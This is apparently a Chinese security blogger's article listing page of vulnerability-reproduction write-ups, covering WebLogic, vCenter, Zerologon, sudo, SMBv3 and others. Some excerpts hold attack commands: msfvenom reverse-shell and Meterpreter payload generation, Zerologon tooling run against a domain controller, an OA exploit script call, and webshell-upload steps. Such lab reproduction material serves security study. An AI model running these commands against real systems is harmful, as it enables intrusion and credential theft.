谢公子
《域渗透攻防指南》作者,国内知名攻防渗透专家。一个小帅哥,热爱技术,追求完美,有追求!擅长渗透测试、红蓝对抗、内网渗透、域渗透、云安全。
展开
-
JAVA反序列化系列漏洞复现
目录Weblogic反序列化漏洞Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)Weblogic反序列化漏洞(CVE-2019-2725)JBOSS反序列化漏洞JBoss JMXInvo...原创 2019-05-31 16:44:09 · 7253 阅读 · 2 评论 -
CVE-2021-21972 vCenter 6.5-7.0 RCE漏洞复现
漏洞介绍vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。2021年02月24日,Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)在vCenter Serve原创 2021-02-25 21:38:11 · 2601 阅读 · 0 评论 -
JumpServer堡垒机远程命令执行漏洞复现
目录JumpServer漏洞简述漏洞影响版本漏洞环境搭建漏洞复现漏洞修复JumpServerJumpServer是使用Python Django 框架进行开发的全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 并且符合4A 的专业运维审计系统。漏洞简述2021年1月15日,JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可通过构造恶意请求获取到日志文件敏感信息,或者执行相关API操.原创 2021-02-06 23:23:32 · 3000 阅读 · 1 评论 -
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现
目录漏洞背景漏洞影响版本漏洞复现环境搭建未授权访问执行payload后回显漏洞修复漏洞背景2020年10月30日,Oracle 官方的发布最新漏洞,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。漏洞影响版本Oracle WeblogicServ原创 2021-02-06 17:19:41 · 2039 阅读 · 0 评论 -
CVE-2021-2109 Weblogic Server远程代码执行复现
漏洞背景2021年1月20日,Oracle官方发布了漏洞补丁,修了包括CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞为Weblogic的远程代码执行漏洞,主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行,危险等级高。漏洞影响版本Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.原创 2021-02-06 15:43:44 · 2013 阅读 · 0 评论 -
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
ConfluenceConfluence是Atlassian公司开发的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence为团队提供一个协作环境。在这里,团队成员齐心协力,各擅其能,协同地编写文档和管理项目。从此打破不同团队、不同部门以及个人之间信息孤岛的僵局,Confluence真正实现了组织资源共享。Confluence 已经在超过100个国家,13500个组织中成功地应用原创 2021-01-31 23:20:39 · 1599 阅读 · 0 评论 -
Linux sudo权限提升漏洞复现(CVE-2021-3156)
目录漏洞背景漏洞影响版本漏洞检测漏洞利用漏洞修复漏洞背景1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或-i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用s..原创 2021-01-27 20:11:29 · 5449 阅读 · 7 评论 -
分享一个好用的CobaltStrike插件
分享一款好用的CobaltStrike插件。首先上图吧,这是一款结合了taowu、Ladon、EventLogMaster等优秀开源插件的一款插件。怎么说呢,就是汇大家之所长吧。由于本人是职业红队,所以在项目中CobaltStrike用的特别多,对市面上现有的开源插件如taowu等都用过,知道这些插件哪些地方好用,哪些地方不好用,并融合自己在项目中的经验,来编写一个混合的插件。这是最初的一个1.0版本,后续会逐渐的修改bug和增加更多更新的功能。好不好用我说了不算,大家说了才算。这个插件目.原创 2021-01-17 22:26:46 · 59197 阅读 · 9 评论 -
Apache Flink任意文件读取和远程文件写入漏洞
目录漏洞描述漏洞影响版本漏洞复现任意文件读取任意文件写入修复建议漏洞描述 Flink 在 1.5.1 版本中引入了一个 REST handler,这允许攻击者将已上传的文件写入本地任意位置的文件中,并且可通过恶意修改的 HTTP 头将这些文件写入到 Flink 1.5.1 可以访问的任意位置。 Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口使用 ../../ 进...原创 2021-01-14 15:38:17 · 1708 阅读 · 0 评论 -
通达OA任意用户登录漏洞复现
通达OA 前台任意用户登录漏洞漏洞描述通达OA官方于4月17日发布安全更新。在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理身份登录OA系统。影响范围 通达OA2017 (V10.x) 通达OAV11.x < 11.5.200417版本 漏洞复现搭建好环境,这里环境使用的是通达OA2017版利用脚本获取cookiepython3 tongda-oA.py -v 2017 -ur.原创 2021-01-03 15:44:08 · 2495 阅读 · 0 评论 -
fastjson反序列化漏洞
FastjsonFastjson是一个阿里巴巴开源的一款使用Java语言编写的高性能功能完善的JSON库,通常被用于将Java Bean和JSON 字符串之间进行转换。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。但是,从诞生之初,fastjson就多次被爆出存在反序列化漏洞。并且,每次都和autoType有关!那么,什原创 2020-12-27 13:43:57 · 2412 阅读 · 0 评论 -
Apache Flink任意Jar包上传getshell
Apache FlinkApache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行msfvenom -p java/shell_reverse_tcp LHOST=VPS的ip地址 LPORT=34567 -f jar > test.jar漏洞描述近日,有安全研原创 2020-10-27 08:28:29 · 2368 阅读 · 0 评论 -
CVE-2020-1472NetLogon权限提升漏洞
目录impacket攻击挂socks5代理打使用mimikatz攻击恢复域控的机器用户哈希获得域控机器账号原始哈希方式一 :方式二:恢复域控原始哈希impacket攻击先执行如下命令判断域控是否存在该漏洞python3 zerologon_tester.py win2008 192.168.10.131该脚本会将域控的机器账号哈希置为空#查询域控的机器用户哈希./secretsdump.py xie.com/administrator:p..原创 2020-10-12 16:21:06 · 2794 阅读 · 0 评论 -
漏洞复现学习手册
JAVA反序列化漏洞复现OpenSSH命令注入漏洞复现(CVE-2020-15778)F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)DNS Server远程代码执行漏洞复现(CVE-2020-1350)CVE-2020-0688漏洞复现CVE-2019-1040域内漏洞提权复现CVE-2020-0796(SMBv3远程代码执行)漏洞复现通达OA低版本文件上传+apache解析漏洞getshell通达OA命令执行漏洞复现(文件上传+文件包含)原创 2020-08-09 18:34:35 · 4093 阅读 · 1 评论 -
OpenSSH命令注入漏洞复现(CVE-2020-15778)
漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。...原创 2020-08-02 15:55:04 · 8648 阅读 · 0 评论 -
DNS Server远程代码执行漏洞复现(CVE-2020-1350)
漏洞描述 2020年7月15日,微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞,官方分类为“可蠕虫级”高危漏洞,易受攻击的漏洞有可能通过恶意软件在易受攻击的计算机之间传播,而无需用户干预。CVSS评分10分(即高危且易利用),漏洞编号CVE-2020-1350。未经身份验证的攻击者可以发送特殊构造的数据包到目标DNS Server来利用此漏洞,成功利用此漏洞可能达到远程代码执行的效果。如果域控制器上存在DNS服务,攻击者可利用此漏洞获取到域控制器的系统权限。另外,DNS服务器一..原创 2020-07-26 22:45:54 · 5122 阅读 · 4 评论 -
Exchange Server反序列化漏洞复现(CVE-2020-0688)
漏洞描述:漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥对服务器发起攻击,在服务器中以SYSTEM权限远程执行代码。漏洞影响版本:Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve原创 2020-07-10 22:58:44 · 2545 阅读 · 0 评论 -
F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)
F5 BIG-IPF5 BIG-IP Edge Gateway是一个接入解决方案,为远程用户提供了SSL VPN远程接入、安全性、应用加速和高可用性服务。CVE-2020-5902漏洞描述2020年7月3日,未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意Java代码执行。进而控制F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,该漏洞影响控制面板受影响,不影响数据面板。漏洞危害等级严重影响版本BIG-IP原创 2020-07-07 10:23:21 · 1991 阅读 · 0 评论 -
SMBv3远程代码执行漏洞复现(CVE-2020-0796)
靶机:192.168.10.1Kali攻击机:192.168.10.13msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python原创 2020-06-05 12:44:19 · 2003 阅读 · 1 评论 -
通达OA低版本文件上传+apache解析漏洞getshell
目录漏洞文件漏洞利用条件漏洞复现漏洞文件 /general/vmeet/privateUpload.php漏洞利用条件通达OA低版本 apache存在解析漏洞漏洞复现测试环境:通达OA 2008,apache存在解析漏洞首先访问是否存在该文件存在的话,将下面代码保存后缀为1.html文件,然后将木马命名为 aaa.php.1,与1.html在同一个目录下<form id="frmUpload" enctype="multipart/for..原创 2020-05-12 20:20:10 · 1942 阅读 · 0 评论 -
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...原创 2020-04-05 19:42:44 · 2112 阅读 · 0 评论 -
通达OA命令执行漏洞复现(文件上传+文件包含)
漏洞描述通达OA是北京通达信科科技有限公司出品的“Office Anywhere通达网络智能办公系统”。在受影响的版本中,攻击者可以在未认证的情况下向服务器上传文件。在特定版本中,还可以造成上传文件中的代码执行。该漏洞无需登录/用户交互即可触发。漏洞等级高危漏洞影响版本V11版 2017版 2016版 2015版 2013增强版 2013版修复建议版本 ...原创 2020-03-22 22:05:50 · 4376 阅读 · 1 评论 -
sudo提权漏洞(CVE-2019-14287)
目录漏洞背景漏洞影响版本利用条件漏洞复现修复建议漏洞背景2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。漏洞影响版本 sudo < 1.8.28利用条件sudo的版本号<1.8.28 知道当前用户的密码 当前用户存在于su...原创 2020-02-24 20:00:04 · 2980 阅读 · 0 评论 -
Apache Tomcat AJP文件包含漏洞复现(CVE-2020-1938)
目录背景漏洞编号漏洞等级漏洞影响版本漏洞复现漏洞修复建议背景2020年02月20日, 国家信息安全漏洞共享平台(CNVD) 收录了CNVD-2020-10487Apache Tomcat文件包含漏洞Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和...原创 2020-02-21 10:58:19 · 7259 阅读 · 4 评论 -
Apache ActiveMQ任意文件写入漏洞复现(CVE-2016-3088)
目录Apache ActiveMQ一、漏洞描述二、漏洞影响版本三、漏洞环境搭建四、漏洞复现Apache ActiveMQApache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;一、漏洞描述该漏洞出现在 fileserver 应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录...原创 2019-12-24 15:23:26 · 1844 阅读 · 0 评论 -
MS08_067漏洞复现(CVE-2008-4250)
MS08_067MS08_067是典型的缓冲区溢出漏洞,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server 2003,无需认证便可以利用这个漏洞 ,对于Windows Vista和Server 2008,可能需...原创 2018-11-26 22:38:53 · 3842 阅读 · 1 评论 -
phpmyadmin爆破和后台getshell
目录phpmyadminphpmyadmin后台的爆破phpmyadmin后台GetShellinto outfile写木马利用日志文件GetshellphpmyadminphpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂...原创 2019-12-09 18:06:40 · 5848 阅读 · 2 评论 -
ElasticSearch远程代码执行漏洞复现(CVE-2014-3120/CVE-2015-1427)
目录CVE-2014-3120CVE-2015-1427CVE-2014-3120老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。复现环境:http://192.168.10.13:9200/漏洞利用:MSFsearch CVE-2014-3120,然后进入...原创 2019-11-07 11:23:18 · 2608 阅读 · 0 评论 -
Nginx PHP 远程代码执行漏洞复现(CVE-2019-11043)
漏洞背景:来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞漏洞描述:当Nginx使用特定的 fastcgi 配置时,存在远程代码执行漏洞,但这个配置并非是Nginx的默认配置。只有当fastcgi_split_path_info 字段被配置为 ^(....原创 2019-10-24 13:40:19 · 1961 阅读 · 0 评论 -
FCKeditor编辑器漏洞
目录FCKeditorasp网页aspx网页php网页jsp网页FCKeditorFCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。它不需要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、P...原创 2019-04-07 20:59:08 · 4590 阅读 · 0 评论 -
Apache Tomcat examples directory vulnerabilities(Apache Tomcat样例目录session操纵漏洞)复现
目录Session操控漏洞示例:Session操控漏洞在Apachetomcat中,有一个默认的example示例目录,该example目录中存着众多的样例,其中/examples/servlets/servlet/SessionExample 允许用户对Session进行操作。由于Session是存储在服务器端的用于验证用户身份的东西。所以,理论上,只要我们可以操控Sessio...原创 2019-05-16 21:42:17 · 9703 阅读 · 0 评论 -
易酷CMS2.5本地文件包含漏洞复现
易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。渗透之前的操作,比如先用后台扫描工具,扫描得到该网站的后台目录结构,才更好的进行后面的操作。我们通过访问该url,将一句话木马写入日志文件中http://192.168.1...原创 2018-11-28 19:30:25 · 3307 阅读 · 0 评论 -
Wordpress主题编辑器漏洞复现
Wordpress是全球流行的博客网站,全球有上百万人使用它来搭建博客。他使用PHP脚本和Mysql数据库来搭建网站。那么,如果当我们在渗透测试过程中获得到了别人Wordpress的账号和密码之后,如何才能拿到该服务器的shell呢?我们可以利用Wordpress主题编辑的功能,在主题的页面中插入我们构造的恶意的php代码,来获得服务器的shell。具体实施过程如下:我们点击 ...原创 2018-11-28 19:00:59 · 2510 阅读 · 1 评论 -
PHPCMS V9.6.0任意文件上传漏洞
目录PHPCMSPHPCMS V9.6.0任意文件上传漏洞PHPCMSPHPCMS是一款网站管理软件,该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件...原创 2019-09-09 11:23:17 · 1666 阅读 · 0 评论 -
Shiro1.2.4反序列化漏洞复现(Shiro550,CVE-2016-4437)
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。它编号为550的 issue 中爆出了严重的 Java 反序列化漏洞。漏洞影响版本:Apache Shiro 1.2.4Shiro反序列化特征:在返回包的 Set-Cookie 中...原创 2019-09-09 11:22:07 · 7616 阅读 · 1 评论 -
IE双杀漏洞复现(CVE-2018-8174)
目录CVE-2018-8174双杀漏洞复现一(不稳定)下载payloadMSF监听CVE-2018-8174双杀漏洞复现二生成payloadMSF监听派生给CS双杀漏洞攻击是一种新型的IE浏览器0day漏洞和新型Office文档漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全...原创 2019-09-09 11:21:41 · 2113 阅读 · 0 评论 -
Tomcat PUT方法任意文件上传(CVE-2017-12615)
目录漏洞复现:漏洞利用工具:漏洞环境:当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。影响范围:Apache Tomcat 7.0.0 - 7.0.81漏洞复现:Tomcat版本:Tomcat 7.0.39...原创 2019-09-04 16:48:23 · 5182 阅读 · 2 评论 -
RDP远程桌面漏洞复现(CVE-2019-0708)
9.7号凌晨一点多,开发者 @rapid7在Github上放出了windows远程桌面服务RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。漏洞影响Windows版本:Windows XP SP3 x86 Windows XP Professional x64 Edition SP2 Windows...原创 2019-09-07 23:18:19 · 5806 阅读 · 1 评论 -
Tomcat管理页面弱口令页面Getshell
目录弱口令Getshell利用Burpsuite对tomcat账号密码进行爆破弱口令GetshellTomcat安装完成后会有如下页面,点击该页面的 Manager App 处会弹出输入用户名和密码的认证框。我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面此时,需要我们输入用户名和密码进行登录。我们可以尝试一...原创 2019-05-22 16:30:49 · 6731 阅读 · 0 评论 -
Weblogic SSRF漏洞(CVE-2014-4210)
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞今天我们讲的是Weblogic存在的SSRF漏洞。该漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp页...原创 2019-05-03 21:51:21 · 6297 阅读 · 1 评论